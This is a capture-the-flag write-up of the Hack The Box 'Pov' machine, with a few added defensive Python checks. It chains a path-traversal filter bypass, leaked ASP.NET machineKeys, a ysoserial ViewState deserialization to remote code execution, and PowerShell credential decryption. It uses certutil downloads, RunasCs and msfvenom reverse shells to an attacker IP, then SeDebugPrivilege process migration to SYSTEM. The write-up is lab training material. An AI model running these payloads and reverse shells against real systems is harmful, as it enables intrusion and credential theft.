
Pov

ASP.NET ViewState parameter attack, LFI (local file inclusion), ysoserial deserialization, SeDebugPrivilege privilege escalation


Information gathering

nmap -sV -sC -v --min-rate 1000 10.10.11.251

Scan results

PORT   STATE SERVICE    VERSION
80/tcp open tcpwrapped
|_http-title: pov.htb
| http-methods:
|_ Supported Methods: GET HEAD

Add the domain pov.htb to /etc/hosts so the site can be reached.

The site turns out to be a corporate website; virtual-host enumeration finds the subdomain dev.pov.htb.

gobuster vhost -u http://pov.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://pov.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.pov.htb Status: 302 [Size: 152] [--> http://dev.pov.htb/portfolio/]

Add that domain to /etc/hosts as well, and the site loads.

There is a file download feature, so we try reading arbitrary files.

Common sensitive file paths cannot be read, though.

The Wappalyzer plugin identifies the web framework as ASP.NET 4.0, and the parameters in the request above are tied to it.

Searching online turns up how to exploit __VIEWSTATE (reference article).

What is ViewState

ViewState is the default mechanism ASP.NET uses to preserve page and control data across requests. While the page's HTML is rendered, the page's current state and the values to be kept across postbacks are serialized into a base64-encoded string, which is then placed in the hidden ViewState field.

ViewState data can be characterised by the following properties, alone or in combination:

  • Base64: this format is used when both the EnableViewStateMac and ViewStateEncryptionMode properties are set to false.

  • Base64 + MAC (message authentication code) enabled: the MAC is activated by setting the EnableViewStateMac property to true. This gives the ViewState data integrity verification.

  • Base64 + encryption: when the ViewStateEncryptionMode property is set to true, encryption is applied to guarantee the confidentiality of the ViewState data.

The article notes that on version 4.5 with EnableViewStateMac=true and ViewStateEncryptionMode=false, the keys live in the web.config file.

(Since ../ is filtered, we bypass the filter by doubling the sequence.)
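The bypass in parentheses above works because a single-pass removal of ../ turns a doubled sequence such as ....// back into ../. The following added example (not code from the original write-up) shows that failure beside a containment check that canonicalises the requested path and rejects anything outside the web root; the web root path is an assumed placeholder.

```python
import posixpath

# Assumed web root for the download handler; the real path on the target is not given.
WEB_ROOT = "/inetpub/wwwroot/portfolio"


def naive_strip(path: str) -> str:
    """Single-pass '../' removal: the kind of filter the write-up bypasses.

    '....//' loses exactly one '../' per pass and collapses to '../',
    so the traversal survives the filter.
    """
    return path.replace("../", "")


def is_contained(base_dir: str, requested: str) -> bool:
    """Canonicalise base_dir + requested and require the result to stay under base_dir.

    Backslashes are normalised because IIS accepts both separators. In a real
    handler, also resolve symlinks/junctions (os.path.realpath) before comparing.
    """
    base = posixpath.normpath(base_dir)
    rel = requested.replace("\\", "/").lstrip("/")
    full = posixpath.normpath(posixpath.join(base, rel))
    return full == base or full.startswith(base + "/")


def download_allowed(requested: str) -> bool:
    """Hardened decision: no string stripping, only the containment check."""
    return is_contained(WEB_ROOT, requested)
```

The containment check does not depend on what the legacy filter produces, so the doubled sequence, a plain ../, and Windows-style ..\ are all rejected the same way.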

web.config

<configuration>
<system.web>
<customErrors mode="On" defaultRedirect="default.aspx" />
<httpRuntime targetFramework="4.5" />
<machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
</system.web>
<system.webServer>
<httpErrors>
<remove statusCode="403" subStatusCode="-1" />
<error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
</httpErrors>
<httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
</system.webServer>
</configuration>
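As an added example (not code from the write-up or the target), this script audits a web.config fragment modelled on the one above for the ViewState settings just discussed: static machineKey values readable by any file-disclosure bug, a weak validation algorithm, a disabled MAC, and ViewState that is signed but not encrypted. The key values in the sample are placeholders.

```python
import xml.etree.ElementTree as ET

# Constructed fragment modelled on the web.config above; key values are placeholders,
# not the keys from the target.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <httpRuntime targetFramework="4.5" />
    <machineKey decryption="AES" decryptionKey="PLACEHOLDER_DECRYPTION_KEY"
                validation="SHA1" validationKey="PLACEHOLDER_VALIDATION_KEY" />
  </system.web>
</configuration>"""

STRONG_VALIDATION = {"HMACSHA256", "HMACSHA384", "HMACSHA512"}


def _child(elem, tag):
    """Direct child by tag name (find() is avoided because 'system.web' contains a dot)."""
    return next((c for c in elem if c.tag == tag), None)


def audit_viewstate_config(xml_text):
    """Return a list of findings about ViewState protection in a web.config."""
    findings = []
    sys_web = _child(ET.fromstring(xml_text), "system.web")
    if sys_web is None:
        return ["no <system.web> section: settings are inherited from machine.config"]
    mk = _child(sys_web, "machineKey")
    pages = _child(sys_web, "pages")

    if mk is not None:
        # Static keys on disk are exactly what a file-read bug hands over.
        for attr in ("validationKey", "decryptionKey"):
            if not mk.get(attr, "AutoGenerate").startswith("AutoGenerate"):
                findings.append(f"static {attr} in web.config: rotate it and keep it out of plain-text config")
        alg = mk.get("validation", "HMACSHA256")
        if alg.upper() not in STRONG_VALIDATION:
            findings.append(f"weak validation algorithm {alg}: use HMACSHA256 or stronger")

    # The MAC must stay on, and signing alone leaves the serialized state readable.
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("enableViewStateMac=false: ViewState is not integrity-protected")
    mode = pages.get("viewStateEncryptionMode", "Auto") if pages is not None else "Auto"
    if mode.lower() != "always":
        findings.append(f"viewStateEncryptionMode={mode}: set it to Always")
    return findings
```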

Attack with YSoSerial.Net (tool link)

./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "ping 10.10.14.46" --apppath="/" --path="/portfolio/default.aspx" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

Note: if the request also sends the __VIEWSTATEGENERATOR parameter, replace --apppath="/" --path="/portfolio/default.aspx" with --generator=8E0F0FA3. A Burp capture does show the parameter, but switching to the --generator option did not work here.

Generate the payload on a Windows system.

Paste it into Burp, and listen locally for traffic on tun0 (10.10.14.46):

sudo tcpdump -i tun0 icmp

Command execution confirmed.

After some attempts, a bash reverse shell does not work, which suggests the target is Windows.

Use PowerShell for the reverse shell instead (script link).

Then generate a new payload and send it through Burp:

./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e <base64-encoded PowerShell reverse shell, omitted here>" --apppath="/" --path="/portfolio/default.aspx" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

Reverse shell obtained.

After some searching, useful information turns up under C:\Users\sfitz\Documents:

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
</Props>
</Obj>
</Objs>

Use PowerShell to decrypt the stored credential and recover the plaintext password (reference article):

$cred = Import-CliXml -Path connection.xml; $cred.GetNetworkCredential() | Format-List *

The password is recovered:

PS C:\Users\sfitz\Documents> $cred = Import-CliXml -Path connection.xml; $cred.GetNetworkCredential() | Format-List *
UserName : alaading
Password : f8gQ8fynP44ek1m3
SecurePassword : System.Security.SecureString
Domain :

Next, use RunasCs to switch user.

First change to the Downloads directory, then download RunasCs from our local HTTP server:

certutil -urlcache -split -f http://10.10.14.46/RunasCs.exe

Then switch user and send a shell back to port 777:

./RunasCs.exe alaading f8gQ8fynP44ek1m3 powershell.exe -r 10.10.14.46:777

Important: spawn PowerShell here. If cmd.exe is used instead, the SeDebugPrivilege privilege turns out to be missing later on.

This gives the user flag.

Check the current user's privileges:

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== ========
SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

SeDebugPrivilege

In Windows, SeDebugPrivilege is an especially powerful privilege: a process holding it can read or modify the memory of almost any other process, including those running as SYSTEM or as an administrator. In the Metasploit framework, holding this privilege makes it possible to read the system's SAM database.

Since SeDebugPrivilege is enabled on the target, we can go straight to privilege escalation.
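Added example, not part of the original write-up: a parser for the whoami /priv output shown above that flags high-risk privileges on the token. The state column is deliberately ignored for the risk verdict, because a privilege the token holds but that is disabled can be re-enabled with AdjustTokenPrivileges, which is exactly what the EnableAllTokenPrivs.ps1 script on this page does. The HIGH_RISK set is my own selection.

```python
# Constructed from the `whoami /priv` output shown above.
WHOAMI_PRIV_OUTPUT = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# Privileges that let a token holder read, impersonate or take over other
# security contexts; their presence, not their state, is the finding.
HIGH_RISK = {
    "SeDebugPrivilege", "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
    "SeLoadDriverPrivilege", "SeTcbPrivilege", "SeCreateTokenPrivilege",
}


def parse_whoami_priv(text: str) -> dict:
    """Map privilege name -> state ('Enabled'/'Disabled') from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        # Data rows start with a Se* name and end with the State column.
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def high_risk_privileges(text: str) -> dict:
    """High-risk privileges present on the token, whatever their current state."""
    return {name: state for name, state in parse_whoami_priv(text).items() if name in HIGH_RISK}
```

A baseline check for a low-privilege service or user account is simply that high_risk_privileges() returns an empty dict.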

To enable the privilege, run the following script (reference article):

EnableAllTokenPrivs.ps1


## All Credit goes to Lee Holmes (@Lee_Holmes on twitter). I found the code here https://www.leeholmes.com/blog/2010/09/24/adjusting-token-privileges-in-powershell/
$definition = @'
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;

namespace Set_TokenPermission
{
    public class SetTokenPriv
    {
        // P/Invoke declarations for the token APIs in advapi32.dll
        [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
        internal static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall,
            ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
        [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
        internal static extern bool OpenProcessToken(IntPtr h, int acc, ref IntPtr phtok);
        [DllImport("advapi32.dll", SetLastError = true)]
        internal static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);

        // TOKEN_PRIVILEGES holding exactly one LUID_AND_ATTRIBUTES entry
        [StructLayout(LayoutKind.Sequential, Pack = 1)]
        internal struct TokPriv1Luid
        {
            public int Count;
            public long Luid;
            public int Attr;
        }

        internal const int SE_PRIVILEGE_ENABLED = 0x00000002;
        internal const int SE_PRIVILEGE_DISABLED = 0x00000000;
        internal const int TOKEN_QUERY = 0x00000008;
        internal const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;

        public static void EnablePrivilege()
        {
            bool retVal;
            TokPriv1Luid tp;
            IntPtr hproc = Process.GetCurrentProcess().Handle;
            IntPtr htok = IntPtr.Zero;

            // Every privilege name the script will try to enable on the current token
            List<string> privs = new List<string>() { "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeBackupPrivilege",
                "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeCreatePagefilePrivilege",
                "SeCreatePermanentPrivilege", "SeCreateSymbolicLinkPrivilege", "SeCreateTokenPrivilege",
                "SeDebugPrivilege", "SeEnableDelegationPrivilege", "SeImpersonatePrivilege", "SeIncreaseBasePriorityPrivilege",
                "SeIncreaseQuotaPrivilege", "SeIncreaseWorkingSetPrivilege", "SeLoadDriverPrivilege",
                "SeLockMemoryPrivilege", "SeMachineAccountPrivilege", "SeManageVolumePrivilege",
                "SeProfileSingleProcessPrivilege", "SeRelabelPrivilege", "SeRemoteShutdownPrivilege",
                "SeRestorePrivilege", "SeSecurityPrivilege", "SeShutdownPrivilege", "SeSyncAgentPrivilege",
                "SeSystemEnvironmentPrivilege", "SeSystemProfilePrivilege", "SeSystemtimePrivilege",
                "SeTakeOwnershipPrivilege", "SeTcbPrivilege", "SeTimeZonePrivilege", "SeTrustedCredManAccessPrivilege",
                "SeUndockPrivilege", "SeUnsolicitedInputPrivilege", "SeDelegateSessionUserImpersonatePrivilege" };

            // Open the current process token with the access AdjustTokenPrivileges needs
            retVal = OpenProcessToken(hproc, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, ref htok);
            tp.Count = 1;
            tp.Luid = 0;
            tp.Attr = SE_PRIVILEGE_ENABLED;

            // Look up each privilege's LUID and ask for it to be enabled. A privilege the
            // token does not hold is left unchanged (ERROR_NOT_ALL_ASSIGNED), so only those
            // already present in the token, such as SeDebugPrivilege here, become enabled.
            foreach (var priv in privs)
            {
                retVal = LookupPrivilegeValue(null, priv, ref tp.Luid);
                retVal = AdjustTokenPrivileges(htok, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
            }
        }
    }
}
'@

$type = Add-Type $definition -PassThru
$type[0]::EnablePrivilege() 2>&1

Start a local HTTP server and upload the script to the target:

certutil -urlcache -split -f http://10.10.14.46/EnableAllTokenPrivs.ps1

Then run .\EnableAllTokenPrivs.ps1.

Back to the box: first generate a Meterpreter executable locally with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.46 LPORT=5555 -f exe > exploit.exe

Then start a local HTTP server and upload it to the target:

certutil -urlcache -split -f http://10.10.14.46/exploit.exe

Initialise the msf database and start msfconsole locally:

sudo msfdb init && msfconsole

Then run the following in order to catch the shell:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.46
set LPORT 5555
run

With the listener running, execute .\exploit.exe on the target; the session comes back.

Running ps lists the processes on the target; note winlogon.exe.

winlogon.exe is the Windows logon process. It starts when a user logs on and handles the logon and logoff sequence. After the user enters a username and password, winlogon.exe validates the credentials and starts the user's environment; it also loads the user profile, launches the user interface and other associated system tasks.

Then use migrate 548 to move the shell into the winlogon.exe process.

Run the shell command; privilege escalation succeeds and we get the flag.